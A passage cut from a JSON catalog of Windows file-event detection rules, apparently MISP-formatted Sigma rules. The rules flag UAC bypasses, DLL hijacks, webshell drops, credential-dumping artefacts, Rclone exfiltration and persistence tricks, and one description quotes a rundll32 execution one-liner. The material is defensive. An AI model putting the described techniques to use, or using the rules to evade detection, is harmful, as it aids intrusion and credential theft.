"dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", "value": "ISO or Image Mount Indicator in Recent Files" }, { "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_creation_unquoted_service_path.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" ], "tags": [ "attack.persistence", "attack.t1547.009" ] }, "related": [ { "dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "value": "Creation Exe for Service with Unquoted Path" }, { "description": "Detects the creation or modification of the Windows Terminal Profile settings file \"settings.json\" by an uncommon process.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-22", "falsepositive": [ "Some false positives may occur with admin scripts that set WT settings." 
], "filename": "file_event_win_susp_windows_terminal_profile.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1550836225652686848", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml" ], "tags": [ "attack.persistence", "attack.t1547.015" ] }, "related": [ { "dest-uuid": "84601337-6a55-4ad7-9c35-79e0d1ea2ab3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b64de98-9db3-4033-bd7a-f51430105f00", "value": "Windows Terminal Profile Settings Modification By Uncommon Process" }, { "description": "Detects the creation or copying of suspicious files (EXE/DLL) into the default GPO storage folder", "meta": { "author": "elhoim", "creation_date": "2022-04-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_default_gpo_dir_write.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-november-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" ], "tags": [ "attack.t1036.005", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", "value": "Suspicious Files in Default GPO Folder" }, { "description": "Detects the creation of screensaver files (.scr) outside of system folders. 
Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "creation_date": "2022-04-27", "falsepositive": [ "The installation of new screen savers by third party software" ], "filename": "file_event_win_new_scr_file.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Libraries/Desk/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_scr_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", "value": "SCR File Write Event" }, { "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", 
"tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "value": "Wmiprvse Wbemcomn DLL Hijack - File" }, { "description": "Detects PowerShell creating a PowerShell file (.ps1). While this behavior is often benign, it can sometimes be a sign of a dropper script trying to achieve persistence.", "meta": { "author": "frack113", "creation_date": "2023-05-09", "falsepositive": [ "False positives will differ depending on the environment and scripts used. Apply additional filters accordingly." ], "filename": "file_event_win_powershell_drop_powershell.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_drop_powershell.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "576426ad-0131-4001-ae01-be175da0c108", "value": "PowerShell Script Dropped Via PowerShell.EXE" }, { "description": "Detects the creation of a new PowerShell module in the first folder of the module directory structure \"\\WindowsPowerShell\\Modules\\malware\\malware.psm1\". This is a somewhat uncommon layout, as legitimate modules usually place their files inside a version subfolder.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-09", "falsepositive": [ "False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production." 
], "filename": "file_event_win_powershell_module_susp_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "e8a52bbd-bced-459f-bd93-64db45ce7657", "value": "Potential Suspicious PowerShell Module File Created" }, { "description": "Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.", "meta": { "author": "Beyu Denis, oscd.community, Tim Shelton, Thurein Oo", "creation_date": "2019-10-22", "falsepositive": [ "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "filename": "file_event_win_webshell_creation_detect.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "PT ESC rule and personal experience", "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "value": "Potential Webshell Creation On Static Website" }, { "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", "meta": { "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "creation_date": "2022-04-27", "falsepositive": [ 
"Unknown" ], "filename": "file_event_win_uac_bypass_eventvwr.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "value": "UAC Bypass Using EventVwr" }, { "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", "meta": { "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "creation_date": "2020-03-19", "falsepositive": [ "Operations performed through Windows SCCM or equivalent", "Read only access list authority" ], "filename": "file_event_win_susp_desktop_ini.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" ], "tags": [ "attack.persistence", "attack.t1547.009" ] }, "related": [ { "dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", "value": "Suspicious desktop.ini Action" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target 
systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "file_event_win_remote_access_tools_screenconnect_artefact.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", "value": "ScreenConnect Temporary Installation Artefact" }, { "description": "Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence", "meta": { "author": "HieuTT35, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-24", "falsepositive": [ "System administrator creating a PowerShell profile manually" ], "filename": "file_event_win_susp_powershell_profile.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://persistence-info.github.io/Data/powershellprofile.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.013" ] }, "related": [ { "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf", "value": "PowerShell Profile Modification" }, { "description": "Detects the creation of a new Outlook form which can contain malicious code", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2021-06-10", "falsepositive": [ "Legitimate use of outlook forms" ], "filename": "file_event_win_office_outlook_newform.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form", "https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml" ], "tags": [ "attack.persistence", "attack.t1137.003" ] }, "related": [ { "dest-uuid": "a9e2cea0-c805-4bf8-9e31-f5f0513a3634", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", "value": "Potential Persistence Via Outlook Form" }, { "description": "Detects Rclone config files being created", "meta": { "author": "Aaron Greetham (@beardofbinary) - NCC Group", "creation_date": "2021-05-26", "falsepositive": [ "Legitimate Rclone usage" ], "filename": "file_event_win_rclone_config_files.yml", "level": 
"medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_config_files.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "value": "Rclone Config File Creation" }, { "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", "meta": { "author": "Greg (rule)", "creation_date": "2022-07-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ripzip_attack.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", "value": "Potential RipZip Attack on Startup Folder" }, { "description": "Detects default CSExec service filename which indicates CSExec service installation and execution", "meta": { "author": 
"Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-04", "falsepositive": [ "Unknown" ], "filename": "file_event_win_csexec_service.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/malcomvetter/CSExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csexec_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0e2b768-5220-47dd-b891-d57b96fc0ec1", "value": "CSExec Service File Creation" }, { "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "System administrators managing certificates." 
], "filename": "file_event_win_susp_pfx_file_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/14", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" ], "tags": [ "attack.credential-access", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", "value": "Suspicious PFX File Creation" }, { "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_msconfig_gui.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f", "value": "UAC Bypass Using MSConfig Token Modification - File" }, { "description": "Detects Octopus Scanner Malware.", "meta": { "author": "NVISO", "creation_date": "2020-06-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_mal_octopus_scanner.yml", "level": "high", "logsource.category": "file_event", 
"logsource.product": "windows", "refs": [ "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" ], "tags": [ "attack.t1195", "attack.t1195.001" ] }, "related": [ { "dest-uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "191cc6af-1bb2-4344-ab5f-28e496638720", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", "value": "Octopus Scanner Malware" }, { "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-02-21", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_tsclient_filewrite_startup.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", "value": "Hijack Legit RDP Session to Move Laterally" }, { "description": "Detects the creation of a file with the \".dll\" extension that has the name of a System DLL in uncommon or unsuspected locations. 
(Outside of \"System32\", \"SysWOW64\", etc.).\nIt is highly recommended to perform an initial baseline before using this rule in production.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-24", "falsepositive": [ "Third party software might bundle specific versions of system DLLs." ], "filename": "file_event_win_creation_system_dll_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13c02350-4177-4e45-ac17-cf7ca628ff5e", "value": "Files With System DLL Name In Unsuspected Locations" }, { "description": "Detects the creation of a file with the name \"code_tunnel.json\", which indicates execution and usage of the VsCode tunneling utility by an \"Image\" or \"Process\" other than VsCode.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Unknown" ], "filename": "file_event_win_vscode_tunnel_renamed_execution.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "d102b8f5-61dc-4e68-bd83-9a3187c67377", "value": "Renamed VsCode Code Tunnel Execution - File Indicator" }, { "description": "Detects Windows executables that write files with suspicious extensions", "meta": { "author": "Nasreddine 
Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_shell_write_susp_files_extensions.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "value": "Windows Binaries Write Suspicious Extensions" }, { "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-29", "falsepositive": [ "Legitimate custom SHIM installations will also trigger this rule" ], "filename": "file_event_win_creation_new_shim_database.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", "https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence", "https://liberty-shell.com/sec/2020/02/25/shim-persistence/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" ], "tags": [ "attack.persistence", "attack.t1547.009" ] }, "related": [ { "dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", "value": "New Custom Shim Database Created" }, { "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_consent_comctl32.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "value": "UAC Bypass Using Consent and Comctl32 - File" }, { "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 
2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE", "creation_date": "2021-10-24", "falsepositive": [ "Depending on your environment, accepted applications may leverage this at times. It is recommended to search for anomalies indicative of malware." ], "filename": "file_event_win_powershell_startup_shortcuts.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", "https://redcanary.com/blog/intelligence-insights-october-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "value": "Potential Startup Shortcut Persistence Via PowerShell.EXE" }, { "description": "Detects the creation of files with well-known filenames (components of credential dumping tools, or files produced by them)", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-11-01", "falsepositive": [ "Legitimate administrator using a tool for password recovery" ], "filename": "file_event_win_cred_dump_tools_dropped_files.yml", "level": "high", "logsource.category": "file_event", 
"logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.t1003.002", "attack.t1003.003", "attack.t1003.004", "attack.t1003.005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "value": "Cred Dump Tools Dropped Files" }, { "description": "Detects the presence and execution of Inveigh via dropped artefacts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-24", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_hktl_inveigh_artefacts.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", "value": "HackTool - Inveigh Execution Artefacts" }, { "description": "Detects programs on a Windows system that should not write scripts to disk", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-08-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_legitimate_app_dropping_script.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d604714-e071-49ff-8726-edeb95a70679", "value": "Legitimate Application Dropped Script" }, { "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. 
